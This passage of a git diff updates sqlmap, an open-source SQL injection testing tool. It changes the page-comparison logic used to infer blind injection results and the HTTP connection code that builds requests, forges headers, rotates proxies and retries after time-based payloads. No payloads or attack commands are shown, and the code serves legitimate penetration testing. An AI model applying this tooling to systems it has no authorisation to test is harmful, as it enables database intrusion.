_urllib.parse.urlsplit(request.get_selector()).netloc + + if not request.has_header(HTTP_HEADER.HOST): + request.add_unredirected_header(HTTP_HEADER.HOST, sel_host) + for name, value in self.parent.addheaders: + name = name.capitalize() + if not request.has_header(name): + request.add_unredirected_header(name, value) + return request + + http_request = _http_request diff --git a/lib/request/comparison.py b/lib/request/comparison.py index f5ac9f2d4e3..4d1f3edce49 100644 --- a/lib/request/comparison.py +++ b/lib/request/comparison.py @@ -1,18 +1,22 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import division + import re from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import listToStrValue from lib.core.common import removeDynamicContent -from lib.core.common import wasLastRequestDBMSError -from lib.core.common import wasLastRequestHTTPError +from lib.core.common import getLastRequestHTTPError +from lib.core.common import wasLastResponseDBMSError +from lib.core.common import wasLastResponseHTTPError +from lib.core.convert import getBytes from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -20,14 +24,25 @@ from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DIFF_TOLERANCE from lib.core.settings import HTML_TITLE_REGEX -from lib.core.settings import MIN_RATIO +from lib.core.settings import LOWER_RATIO_BOUND +from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH from lib.core.settings import MAX_RATIO +from lib.core.settings import MIN_RATIO from lib.core.settings import REFLECTED_VALUE_MARKER -from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND +from lib.core.settings import URI_HTTP_HEADER from lib.core.threads import getCurrentThreadData +from thirdparty import six def comparison(page, 
headers, code=None, getRatioValue=False, pageLength=None): + if not isinstance(page, (six.text_type, six.binary_type, type(None))): + logger.critical("got page of type %s; repr(page)[:200]=%s" % (type(page), repr(page)[:200])) + + try: + page = b"".join(page) + except: + page = six.text_type(page) + _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue) return _ @@ -47,25 +62,29 @@ def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: - threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" + threadData.lastComparisonHeaders = listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "" threadData.lastComparisonPage = page + threadData.lastComparisonCode = code if page is None and pageLength is None: return None - seqMatcher = threadData.seqMatcher - seqMatcher.set_seq1(kb.pageTemplate) - if any((conf.string, conf.notString, conf.regexp)): - rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) + rawResponse = "%s%s" % (listToStrValue(_ for _ in headers.headers if not _.startswith("%s:" % URI_HTTP_HEADER)) if headers else "", page) - # String to match in page when the query is True and/or valid + # String to match in page when the query is True if conf.string: return conf.string in rawResponse - # String to match in page when the query is False and/or invalid + # String to match in page when the query is False if conf.notString: - return conf.notString not in rawResponse + if conf.notString in rawResponse: + return False + else: + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()): + return None + else: + return True # Regular expression to match in page when the query is True and/or valid if conf.regexp: @@ -75,22 +94,30 @@ def _comparison(page, headers, code, getRatioValue, pageLength): if conf.code: return conf.code == code + seqMatcher = threadData.seqMatcher + seqMatcher.set_seq1(kb.pageTemplate) + if page: # In case of an DBMS error page return None - if kb.errorIsNone and (wasLastRequestDBMSError() or wasLastRequestHTTPError()): - return None + if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()) and not kb.negativeLogic: + if not (wasLastResponseHTTPError() and getLastRequestHTTPError() in (conf.ignoreCode or [])): + return None # Dynamic content lines to be excluded before comparison if not kb.nullConnection: page = removeDynamicContent(page) - seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) + if threadData.lastPageTemplate != kb.pageTemplate: + threadData.lastPageTemplateCleaned = removeDynamicContent(kb.pageTemplate) + threadData.lastPageTemplate = kb.pageTemplate + + seqMatcher.set_seq1(threadData.lastPageTemplateCleaned) if not pageLength: pageLength = len(page) if kb.nullConnection and pageLength: if not seqMatcher.a: - errMsg = "problem occured while retrieving original page content " + errMsg = "problem occurred while retrieving original page content " errMsg += "which prevents sqlmap from continuation. Please rerun, " errMsg += "and if the problem persists turn off any optimization switches" raise SqlmapNoneDataException(errMsg) @@ -102,40 +129,68 @@ def _comparison(page, headers, code, getRatioValue, pageLength): else: # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" # (e.g. 
if one page is PDF and the other is HTML) - if isinstance(seqMatcher.a, str) and isinstance(page, unicode): - page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): - seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') - - seq1, seq2 = None, None + if isinstance(seqMatcher.a, six.binary_type) and isinstance(page, six.text_type): + page = getBytes(page, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore") + elif isinstance(seqMatcher.a, six.text_type) and isinstance(page, six.binary_type): + seqMatcher.set_seq1(getBytes(seqMatcher.a, kb.pageEncoding or DEFAULT_PAGE_ENCODING, "ignore")) - if conf.titles: - seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) - seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + if any(_ is None for _ in (page, seqMatcher.a)): + return None + elif seqMatcher.a and page and seqMatcher.a == page: + ratio = 1. + elif kb.skipSeqMatcher or seqMatcher.a and page and any(len(_) > MAX_DIFFLIB_SEQUENCE_LENGTH for _ in (seqMatcher.a, page)): + if not page or not seqMatcher.a: + return float(seqMatcher.a == page) + else: + ratio = 1. * len(seqMatcher.a) / len(page) + if ratio > 1: + ratio = 1. / ratio else: - seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a - seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + seq1, seq2 = None, None - if seq1 is None or seq2 is None: - return None + if conf.titles: + seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) + seq2 = extractRegexResult(HTML_TITLE_REGEX, page) + else: + seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a + seq2 = getFilteredPageContent(page, True) if conf.textOnly else page + + if seq1 is None or seq2 is None: + return None + + if isinstance(seq1, six.binary_type): + seq1 = seq1.replace(REFLECTED_VALUE_MARKER.encode(), b"") + elif isinstance(seq1, six.text_type): + seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") - seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") + if isinstance(seq2, six.binary_type): + seq2 = seq2.replace(REFLECTED_VALUE_MARKER.encode(), b"") + elif isinstance(seq2, six.text_type): + seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") - count = 0 - while count < min(len(seq1), len(seq2)): - if seq1[count] == seq2[count]: - count += 1 + if kb.heavilyDynamic: + seq1 = seq1.split("\n" if isinstance(seq1, six.text_type) else b"\n") + seq2 = seq2.split("\n" if isinstance(seq2, six.text_type) else b"\n") + + key = None + else: + key = (hash(seq1), hash(seq2)) + + seqMatcher.set_seq1(seq1) + seqMatcher.set_seq2(seq2) + + if key in kb.cache.comparison: + ratio = kb.cache.comparison[key] else: - break - if count: - seq1 = seq1[count:] - seq2 = seq2[count:] + try: + ratio = seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio() + except (TypeError, MemoryError): + ratio = seqMatcher.ratio() - seqMatcher.set_seq1(seq1) - seqMatcher.set_seq2(seq2) + ratio = round(ratio, 3) - ratio = round(seqMatcher.quick_ratio(), 3) + if key: + kb.cache.comparison[key] = ratio # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content @@ -144,6 +199,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) + if kb.testMode: + threadData.lastComparisonRatio = ratio + 
# If it has been requested to return the ratio and not a comparison # response if getRatioValue: @@ -152,6 +210,9 @@ def _comparison(page, headers, code, getRatioValue, pageLength): elif ratio > UPPER_RATIO_BOUND: return True + elif ratio < LOWER_RATIO_BOUND: + return False + elif kb.matchRatio is None: return None diff --git a/lib/request/connect.py b/lib/request/connect.py index e2ea2ac3efa..ad22bf9575c 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1,88 +1,151 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import httplib -import json +import binascii +import inspect +import logging +import os +import random import re import socket import string +import struct +import sys import time -import urllib2 -import urlparse import traceback -from extra.safe2bin.safe2bin import safecharencode +try: + import websocket + from websocket import WebSocketException +except ImportError: + class WebSocketException(Exception): + pass + from lib.core.agent import agent from lib.core.common import asciifyUrl from lib.core.common import calculateDeltaSeconds +from lib.core.common import checkFile +from lib.core.common import checkSameHost +from lib.core.common import chunkSplitPostData from lib.core.common import clearConsoleLine -from lib.core.common import cpuThrottle +from lib.core.common import dataToStdout +from lib.core.common import escapeJsonValue from lib.core.common import evaluateCode from lib.core.common import extractRegexResult +from lib.core.common import filterNone from lib.core.common import findMultipartPostBoundary from lib.core.common import getCurrentThreadData +from lib.core.common import getHeader from lib.core.common import getHostHeader from lib.core.common import getRequestHeader -from lib.core.common import getUnicode +from lib.core.common import getSafeExString from lib.core.common import logHTTPTraffic +from lib.core.common import openFile +from lib.core.common import popValue +from lib.core.common import parseJson +from lib.core.common import pushValue from lib.core.common import randomizeParameterValue +from lib.core.common import randomInt +from lib.core.common import randomStr from lib.core.common import readInput from lib.core.common import removeReflectiveValues +from lib.core.common import safeVariableNaming +from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.common import stdev -from lib.core.common import wasLastRequestDelayed -from lib.core.common import unicodeencode +from lib.core.common import unArrayizeValue +from lib.core.common import unsafeVariableNaming +from lib.core.common import urldecode from lib.core.common import urlencode +from lib.core.common import wasLastResponseDelayed +from lib.core.compat import LooseVersion +from lib.core.compat import patchHeaders +from lib.core.compat import xrange +from lib.core.convert import encodeBase64 +from lib.core.convert import getBytes +from lib.core.convert import getText +from lib.core.convert import getUnicode +from lib.core.data import cmdLineOptions from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.datatype import AttribDict +from lib.core.decorators import stackedmethod from lib.core.dicts import POST_HINT_CONTENT_TYPES from lib.core.enums import ADJUST_TIME_DELAY 
+from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING -from lib.core.enums import HTTPHEADER +from lib.core.enums import HINT +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD from lib.core.enums import NULLCONNECTION from lib.core.enums import PAYLOAD from lib.core.enums import PLACE from lib.core.enums import POST_HINT from lib.core.enums import REDIRECTION -from lib.core.enums import WEB_API +from lib.core.enums import WEB_PLATFORM from lib.core.exception import SqlmapCompressionException from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapMissingDependence +from lib.core.exception import SqlmapSkipTargetException from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapTokenException from lib.core.exception import SqlmapValueException -from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR +from lib.core.settings import ASTERISK_MARKER +from lib.core.settings import BOUNDARY_BACKSLASH_MARKER from lib.core.settings import DEFAULT_CONTENT_TYPE +from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import DEFAULT_GET_POST_DELIMITER -from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE +from lib.core.settings import DEFAULT_USER_AGENT +from lib.core.settings import EVALCODE_ENCODED_PREFIX from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE -from lib.core.settings import HTTP_SILENT_TIMEOUT -from lib.core.settings import MAX_CONNECTION_CHUNK_SIZE +from lib.core.settings import HTTP_ACCEPT_HEADER_VALUE +from lib.core.settings import IPS_WAF_CHECK_PAYLOAD +from lib.core.settings import IS_WIN +from lib.core.settings import JAVASCRIPT_HREF_REGEX +from lib.core.settings import LARGE_READ_TRIM_MARKER +from lib.core.settings import LIVE_COOKIES_TIMEOUT +from lib.core.settings import MIN_HTTPX_VERSION +from lib.core.settings import MAX_CONNECTION_READ_SIZE from lib.core.settings import MAX_CONNECTIONS_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE +from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS +from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import META_REFRESH_REGEX +from lib.core.settings import MAX_TIME_RESPONSES from lib.core.settings import MIN_TIME_RESPONSES -from lib.core.settings import IS_WIN -from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PERMISSION_DENIED_REGEX +from lib.core.settings import PLAIN_TEXT_CONTENT_TYPE +from lib.core.settings import RANDOM_INTEGER_MARKER +from lib.core.settings import RANDOM_STRING_MARKER +from lib.core.settings import REPLACEMENT_MARKER +from lib.core.settings import SAFE_HEX_MARKER +from lib.core.settings import TEXT_CONTENT_TYPE_REGEX from lib.core.settings import UNENCODED_ORIGINAL_VALUE +from lib.core.settings import UNICODE_ENCODING from lib.core.settings import URI_HTTP_HEADER from lib.core.settings import WARN_TIME_STDEV +from lib.core.settings import WEBSOCKET_INITIAL_TIMEOUT +from lib.core.settings import YUGE_FACTOR from lib.request.basic import decodePage from lib.request.basic import forgeHeaders from lib.request.basic import processResponse -from lib.request.direct import direct from lib.request.comparison import comparison +from lib.request.direct import direct from lib.request.methodrequest import MethodRequest -from lib.utils.checkpayload import checkPayload +from 
lib.utils.safe2bin import safecharencode +from thirdparty import six +from thirdparty.odict import OrderedDict +from thirdparty.six import unichr as _unichr +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import urllib as _urllib from thirdparty.socks.socks import ProxyError -from thirdparty.multipart import multipartpost - class Connect(object): """ @@ -91,23 +154,43 @@ class Connect(object): @staticmethod def _getPageProxy(**kwargs): - return Connect.getPage(**kwargs) + try: + if (len(inspect.stack()) > sys.getrecursionlimit() // 2): # Note: https://github.com/sqlmapproject/sqlmap/issues/4525 + warnMsg = "unable to connect to the target URL" + raise SqlmapConnectionException(warnMsg) + except (TypeError, UnicodeError): + pass + + try: + return Connect.getPage(**kwargs) + except RuntimeError: + return None, None, None @staticmethod def _retryProxy(**kwargs): threadData = getCurrentThreadData() threadData.retriesCount += 1 + if conf.proxyList and threadData.retriesCount >= conf.retries and not kb.locks.handlers.locked(): + warnMsg = "changing proxy" + logger.warning(warnMsg) + + conf.proxy = None + threadData.retriesCount = 0 + + setHTTPHandlers() + if kb.testMode and kb.previousMethod == PAYLOAD.METHOD.TIME: # timed based payloads can cause web server unresponsiveness # if the injectable piece of code is some kind of JOIN-like query - warnMsg = "most probably web server instance hasn't recovered yet " + warnMsg = "most likely web server instance hasn't recovered yet " warnMsg += "from previous timed based payload. If the problem " - warnMsg += "persists please wait for few minutes and rerun " - warnMsg += "without flag T in option '--technique' " + warnMsg += "persists please wait for a few minutes and rerun " + warnMsg += "without flag 'T' in option '--technique' " warnMsg += "(e.g. '--flush-session --technique=BEUS') or try to " warnMsg += "lower the value of option '--time-sec' (e.g. '--time-sec=2')" singleTimeWarnMessage(warnMsg) + elif kb.originalPage is None: if conf.tor: warnMsg = "please make sure that you have " @@ -115,48 +198,63 @@ def _retryProxy(**kwargs): warnMsg += "you could successfully use " warnMsg += "switch '--tor' " if IS_WIN: - warnMsg += "(e.g. 'https://www.torproject.org/download/download.html.en')" + warnMsg += "(e.g. 'https://www.torproject.org/download/')" else: warnMsg += "(e.g. 'https://help.ubuntu.com/community/Tor')" else: warnMsg = "if the problem persists please check that the provided " - warnMsg += "target url is valid. In case that it is, you can try to rerun " - warnMsg += "with the switch '--random-agent' turned on " - warnMsg += "and/or proxy switches ('--ignore-proxy', '--proxy',...)" + warnMsg += "target URL is reachable" + + items = [] + if not conf.randomAgent: + items.append("switch '--random-agent'") + if not any((conf.proxy, conf.proxyFile, conf.tor)): + items.append("proxy switches ('--proxy', '--proxy-file'...)") + if items: + warnMsg += ". 
In case that it is, " + warnMsg += "you can try to rerun with " + warnMsg += " and/or ".join(items) + singleTimeWarnMessage(warnMsg) + elif conf.threads > 1: warnMsg = "if the problem persists please try to lower " warnMsg += "the number of used threads (option '--threads')" singleTimeWarnMessage(warnMsg) - time.sleep(1) - kwargs['retrying'] = True return Connect._getPageProxy(**kwargs) @staticmethod def _connReadProxy(conn): - retVal = "" + retVal = b"" if not kb.dnsMode and conn: headers = conn.info() - if headers and (headers.getheader(HTTPHEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate")\ - or "text" not in headers.getheader(HTTPHEADER.CONTENT_TYPE, "").lower()): + if kb.pageCompress and headers and hasattr(headers, "getheader") and (headers.getheader(HTTP_HEADER.CONTENT_ENCODING, "").lower() in ("gzip", "deflate") or "text" not in headers.getheader(HTTP_HEADER.CONTENT_TYPE, "").lower()): retVal = conn.read(MAX_CONNECTION_TOTAL_SIZE) if len(retVal) == MAX_CONNECTION_TOTAL_SIZE: warnMsg = "large compressed response detected. Disabling compression" singleTimeWarnMessage(warnMsg) kb.pageCompress = False + raise SqlmapCompressionException else: while True: - _ = conn.read(MAX_CONNECTION_CHUNK_SIZE) - if len(_) == MAX_CONNECTION_CHUNK_SIZE: + if not conn: + break + else: + try: + part = conn.read(MAX_CONNECTION_READ_SIZE) + except AssertionError: + part = b"" + + if len(part) == MAX_CONNECTION_READ_SIZE: warnMsg = "large response detected. This could take a while" singleTimeWarnMessage(warnMsg) - _ = re.sub(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start), "%s%s%s" % (kb.chars.stop, LARGE_CHUNK_TRIM_MARKER, kb.chars.start), _) - retVal += _ + part = re.sub(getBytes(r"(?si)%s.+?%s" % (kb.chars.stop, kb.chars.start)), getBytes("%s%s%s" % (kb.chars.stop, LARGE_READ_TRIM_MARKER, kb.chars.start)), part) + retVal += part else: - retVal += _ + retVal += part break if len(retVal) > MAX_CONNECTION_TOTAL_SIZE: @@ -164,49 +262,115 @@ def _connReadProxy(conn): singleTimeWarnMessage(warnMsg) break + if conf.yuge: + retVal = YUGE_FACTOR * retVal + return retVal @staticmethod def getPage(**kwargs): """ - This method connects to the target url or proxy and returns - the target url page content + This method connects to the target URL or proxy and returns + the target URL page content """ - if conf.delay is not None and isinstance(conf.delay, (int, float)) and conf.delay > 0: + if conf.offline: + return None, None, None + + url = kwargs.get("url", None) or conf.url + get = kwargs.get("get", None) + post = kwargs.get("post", None) + method = kwargs.get("method", None) + cookie = kwargs.get("cookie", None) + ua = kwargs.get("ua", None) or conf.agent + referer = kwargs.get("referer", None) or conf.referer + direct_ = kwargs.get("direct", False) + multipart = kwargs.get("multipart", None) + silent = kwargs.get("silent", False) + raise404 = kwargs.get("raise404", True) + timeout = kwargs.get("timeout", None) or conf.timeout + auxHeaders = kwargs.get("auxHeaders", None) + response = kwargs.get("response", False) + ignoreTimeout = kwargs.get("ignoreTimeout", False) or kb.ignoreTimeout or conf.ignoreTimeouts + refreshing = kwargs.get("refreshing", False) + retrying = kwargs.get("retrying", False) + crawling = kwargs.get("crawling", False) + checking = kwargs.get("checking", False) + skipRead = kwargs.get("skipRead", False) + finalCode = kwargs.get("finalCode", False) + chunked = kwargs.get("chunked", False) or conf.chunked + + if isinstance(conf.delay, (int, float)) and conf.delay > 0: 
time.sleep(conf.delay) - elif conf.cpuThrottle: - cpuThrottle(conf.cpuThrottle) + + start = time.time() threadData = getCurrentThreadData() with kb.locks.request: kb.requestCounter += 1 threadData.lastRequestUID = kb.requestCounter - url = kwargs.get('url', conf.url) - get = kwargs.get('get', None) - post = kwargs.get('post', None) - method = kwargs.get('method', None) - cookie = kwargs.get('cookie', None) - ua = kwargs.get('ua', None) - referer = kwargs.get('referer', None) - host = kwargs.get('host', conf.host) - direct_ = kwargs.get('direct', False) - multipart = kwargs.get('multipart', False) - silent = kwargs.get('silent', False) - raise404 = kwargs.get('raise404', True) - auxHeaders = kwargs.get('auxHeaders', None) - response = kwargs.get('response', False) - ignoreTimeout = kwargs.get('ignoreTimeout', kb.ignoreTimeout) - refreshing = kwargs.get('refreshing', False) - retrying = kwargs.get('retrying', False) - crawling = kwargs.get('crawling', False) - - if not urlparse.urlsplit(url).netloc: - url = urlparse.urljoin(conf.url, url) + if conf.proxyFreq: + if kb.requestCounter % conf.proxyFreq == 0: + conf.proxy = None + + warnMsg = "changing proxy" + logger.warning(warnMsg) + + setHTTPHandlers() + + if conf.dummy or conf.murphyRate and randomInt() % conf.murphyRate == 0: + if conf.murphyRate: + time.sleep(randomInt() % (MAX_MURPHY_SLEEP_TIME + 1)) + + page, headers, code = randomStr(int(randomInt()), alphabet=[_unichr(_) for _ in xrange(256)]), None, None if not conf.murphyRate else randomInt(3) + + threadData.lastPage = page + threadData.lastCode = code + + return page, headers, code + + if conf.liveCookies: + with kb.locks.liveCookies: + if not checkFile(conf.liveCookies, raiseOnError=False) or os.path.getsize(conf.liveCookies) == 0: + warnMsg = "[%s] [WARNING] live cookies file '%s' is empty or non-existent. 
Waiting for timeout (%d seconds)" % (time.strftime("%X"), conf.liveCookies, LIVE_COOKIES_TIMEOUT) + dataToStdout(warnMsg) + + valid = False + for _ in xrange(LIVE_COOKIES_TIMEOUT): + if checkFile(conf.liveCookies, raiseOnError=False) and os.path.getsize(conf.liveCookies) > 0: + valid = True + break + else: + dataToStdout('.') + time.sleep(1) + + dataToStdout("\n") + + if not valid: + errMsg = "problem occurred while loading cookies from file '%s'" % conf.liveCookies + raise SqlmapValueException(errMsg) + + cookie = openFile(conf.liveCookies).read().strip() + cookie = re.sub(r"(?i)\ACookie:\s*", "", cookie) + + if multipart: + post = multipart + else: + if not post: + chunked = False + + elif chunked: + post = _urllib.parse.unquote(post) + post = chunkSplitPostData(post) + + webSocket = url.lower().startswith("ws") + + if not _urllib.parse.urlsplit(url).netloc: + url = _urllib.parse.urljoin(conf.url, url) # flag to know if we are dealing with the same target host - target = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], [url, conf.url or ""])) + target = checkSameHost(url, conf.url) if not retrying: # Reset the number of connection retries @@ -216,12 +380,17 @@ def getPage(**kwargs): # url splitted with space char while urlencoding it in the later phase url = url.replace(" ", "%20") - code = None + if "://" not in url: + url = "http://%s" % url + + conn = None page = None + code = None + status = None - _ = urlparse.urlsplit(url) - requestMsg = u"HTTP request [#%d]:\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) - requestMsg += ("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling)) else url + _ = _urllib.parse.urlsplit(url) + requestMsg = u"HTTP request [#%d]:\r\n%s " % (threadData.lastRequestUID, method or (HTTPMETHOD.POST if post is not None else HTTPMETHOD.GET)) + requestMsg += getUnicode(("%s%s" % (_.path or "/", ("?%s" % _.query) if _.query else "")) if not any((refreshing, crawling, checking)) else url) responseMsg = u"HTTP response " requestHeaders = u"" responseHeaders = None @@ -234,335 +403,634 @@ def getPage(**kwargs): # support those by default url = asciifyUrl(url) - # fix for known issues when using url in unicode format - # (e.g. UnicodeDecodeError: "url = url + '?' + query" in redirect case) - url = unicodeencode(url) - try: - if silent: - socket.setdefaulttimeout(HTTP_SILENT_TIMEOUT) - else: - socket.setdefaulttimeout(conf.timeout) + socket.setdefaulttimeout(timeout) if direct_: - if "?" in url: - url, params = url.split("?") + if '?' 
in url: + url, params = url.split('?', 1) params = urlencode(params) url = "%s?%s" % (url, params) - requestMsg += "?%s" % params - - elif multipart: - # Needed in this form because of potential circle dependency - # problem (option -> update -> connect -> option) - from lib.core.option import proxyHandler - - multipartOpener = urllib2.build_opener(proxyHandler, multipartpost.MultipartPostHandler) - conn = multipartOpener.open(unicodeencode(url), multipart) - page = Connect._connReadProxy(conn) - responseHeaders = conn.info() - responseHeaders[URI_HTTP_HEADER] = conn.geturl() - page = decodePage(page, responseHeaders.get(HTTPHEADER.CONTENT_ENCODING), responseHeaders.get(HTTPHEADER.CONTENT_TYPE)) - return page - - elif any((refreshing, crawling)): + elif any((refreshing, crawling, checking)): pass elif target: + if conf.forceSSL: + url = re.sub(r"(?i)\A(http|ws):", r"\g<1>s:", url) + url = re.sub(r"(?i):80/", ":443/", url) + if PLACE.GET in conf.parameters and not get: get = conf.parameters[PLACE.GET] + if not conf.skipUrlEncode: + get = urlencode(get, limit=True) + if get: - url = "%s?%s" % (url, get) - requestMsg += "?%s" % get + if '?' in url: + url = "%s%s%s" % (url, DEFAULT_GET_POST_DELIMITER, get) + requestMsg += "%s%s" % (DEFAULT_GET_POST_DELIMITER, get) + else: + url = "%s?%s" % (url, get) + requestMsg += "?%s" % get - if conf.method == HTTPMETHOD.POST and not post: - for place in (PLACE.POST,): - if place in conf.parameters: - post = conf.parameters[place] - break + if PLACE.POST in conf.parameters and not post and method != HTTPMETHOD.GET: + post = conf.parameters[PLACE.POST] elif get: url = "%s?%s" % (url, get) requestMsg += "?%s" % get - requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str + requestMsg += " %s" % _http_client.HTTPConnection._http_vsn_str # Prepare HTTP headers - headers = forgeHeaders({HTTPHEADER.COOKIE: cookie, HTTPHEADER.USER_AGENT: ua, HTTPHEADER.REFERER: referer}) + headers = forgeHeaders({HTTP_HEADER.COOKIE: cookie, HTTP_HEADER.USER_AGENT: ua, HTTP_HEADER.REFERER: referer, HTTP_HEADER.HOST: getHeader(dict(conf.httpHeaders), HTTP_HEADER.HOST) or getHostHeader(url)}, base=None if target else {}) + + if HTTP_HEADER.COOKIE in headers: + cookie = headers[HTTP_HEADER.COOKIE] if kb.authHeader: - headers[HTTPHEADER.AUTHORIZATION] = kb.authHeader + headers[HTTP_HEADER.AUTHORIZATION] = kb.authHeader if kb.proxyAuthHeader: - headers[HTTPHEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader + headers[HTTP_HEADER.PROXY_AUTHORIZATION] = kb.proxyAuthHeader + + if not conf.requestFile or not target: + if not getHeader(headers, HTTP_HEADER.ACCEPT): + headers[HTTP_HEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - headers[HTTPHEADER.ACCEPT] = HTTP_ACCEPT_HEADER_VALUE - headers[HTTPHEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if method != HTTPMETHOD.HEAD and kb.pageCompress else "identity" - headers[HTTPHEADER.HOST] = host or getHostHeader(url) + if not getHeader(headers, HTTP_HEADER.ACCEPT_ENCODING): + headers[HTTP_HEADER.ACCEPT_ENCODING] = HTTP_ACCEPT_ENCODING_HEADER_VALUE if kb.pageCompress else "identity" - if post is not None and HTTPHEADER.CONTENT_TYPE not in headers: - headers[HTTPHEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE) + elif conf.requestFile and getHeader(headers, HTTP_HEADER.USER_AGENT) == DEFAULT_USER_AGENT: + for header in headers: + if header.upper() == HTTP_HEADER.USER_AGENT.upper(): + del headers[header] + break + + if post is not None and not multipart and not getHeader(headers, HTTP_HEADER.CONTENT_TYPE): 
+ headers[HTTP_HEADER.CONTENT_TYPE] = POST_HINT_CONTENT_TYPES.get(kb.postHint, DEFAULT_CONTENT_TYPE if unArrayizeValue(conf.base64Parameter) != HTTPMETHOD.POST else PLAIN_TEXT_CONTENT_TYPE) - if headers.get(HTTPHEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: - warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTPHEADER.CONTENT_TYPE + if headers.get(HTTP_HEADER.CONTENT_TYPE) == POST_HINT_CONTENT_TYPES[POST_HINT.MULTIPART]: + warnMsg = "missing 'boundary parameter' in '%s' header. " % HTTP_HEADER.CONTENT_TYPE warnMsg += "Will try to reconstruct" singleTimeWarnMessage(warnMsg) boundary = findMultipartPostBoundary(conf.data) if boundary: - headers[HTTPHEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTPHEADER.CONTENT_TYPE], boundary) + headers[HTTP_HEADER.CONTENT_TYPE] = "%s; boundary=%s" % (headers[HTTP_HEADER.CONTENT_TYPE], boundary) + + if conf.keepAlive: + headers[HTTP_HEADER.CONNECTION] = "keep-alive" + + if chunked: + headers[HTTP_HEADER.TRANSFER_ENCODING] = "chunked" if auxHeaders: - for key, item in auxHeaders.items(): - headers[key] = item + headers = forgeHeaders(auxHeaders, headers) + + if kb.headersFile: + content = openFile(kb.headersFile, 'r').read() + for line in content.split("\n"): + line = getText(line.strip()) + if ':' in line: + header, value = line.split(':', 1) + headers[header] = value + + if conf.localhost: + headers[HTTP_HEADER.HOST] = "localhost" + + for key, value in list(headers.items()): + if key.upper() == HTTP_HEADER.ACCEPT_ENCODING.upper(): + value = re.sub(r"(?i)(,)br(,)?", lambda match: ',' if match.group(1) and match.group(2) else "", value) or "identity" - for key, item in headers.items(): del headers[key] - headers[unicodeencode(key, kb.pageEncoding)] = unicodeencode(item, kb.pageEncoding) + if isinstance(value, six.string_types): + for char in (r"\r", r"\n"): + value = re.sub(r"(%s)([^ \t])" % char, 